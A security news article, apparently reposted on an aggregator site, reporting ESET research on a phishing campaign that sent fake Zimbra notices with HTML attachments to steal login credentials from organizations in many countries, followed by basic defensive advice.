Phishing Attack Targets Hundreds of Zimbra Customers in 4 Continents

  /     /     /  
Publicated : 23/11/2024   Category : security


Phishing Attack Targets Hundreds of Zimbra Customers in 4 Continents


A good chunk of the entire user base of a particular email service is being targeted for sensitive credentials.



Despite its simplicity, a phishing campaign targeting customers of the Zimbra Collaboration software suite has spread to hundreds of organizations in over a dozen countries.
Zimbra is a collaborative software suite, which includes an email server and Web client. It is a niche alternative to traditional enterprise email solutions with a small fraction of the market, according to user figures tracked by
Enlyft
and
6sense
.
Zimbra has been beset by security incidents all year, including
a remote code execution bug
,
a cross-site scripting zero-day
, and
an infostealing campaign by the nation of North Korea
.
According to researchers at ESET
, since April 2023, an unidentified threat actor has been using scattershot phishing emails to cull credentials for privileged Zimbra accounts. The primary targets have been small-to-midsized businesses (the open-core softwares primary customer base), though some government organizations were swept up in the campaign, as well.
Hundreds of different organizations were targeted by this campaign, claims Anton Cherepanov, senior malware researcher for ESET. However, the extent of damage is hard to say, because most of the attacks were rooted out before they took hold.
Each attack starts the same — a general phishing email, purporting to come from Zimbra itself, relaying some kind of urgent message about, say, a server update, or account deactivation. For example, the following note titled Important information from Zimbra Security Service:
Starting today 3/7/2023 Your Zimbra web client login page will change. We are preparing for an email update. However, to avoid deactivation and loss of access to your email account, preview the download of the attachment.
The email is signed Zimbra Boss — Administration.
Attached is an HTML file, directing the user to a generic Zimbra login page with some identifying elements customized for the particular target organization. The page opens in the users browser, despite being a local file path, and prefills the username field, in order to give the impression of a legitimate Zimbra login page.
Of course, any user who types in their password into the fake login page will be sending the sensitive information straight to the attackers.
The worst-case outcome is that attackers could gain Zimbra Administrators privileges, and then potentially root privileges on the server itself. But it depends on many factors such as potential password re-use, configuration used, etc, Cherepanov says.
The country most affected by this campaign is Poland, followed by Ecuador and Italy, with attacks also reaching as far and wide as Mexico, Kazakhstan, and the Netherlands. Targets share nothing in common aside from their use of Zimbra.
To avoid compromise, Cherepanov recommends standard security hygiene: using strong passwords, multi-factor authentication, and updating to the most recent version of Zimbra.

Last News

▸ There are plenty of online tools for reporting bugs. ◂
Discovered: 23/12/2024
Category: security

▸ 27 Million South Koreans Hit by Online Gaming Theft. ◂
Discovered: 23/12/2024
Category: security

▸ Homeland Security Background Checks Breach Raises Concerns. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Phishing Attack Targets Hundreds of Zimbra Customers in 4 Continents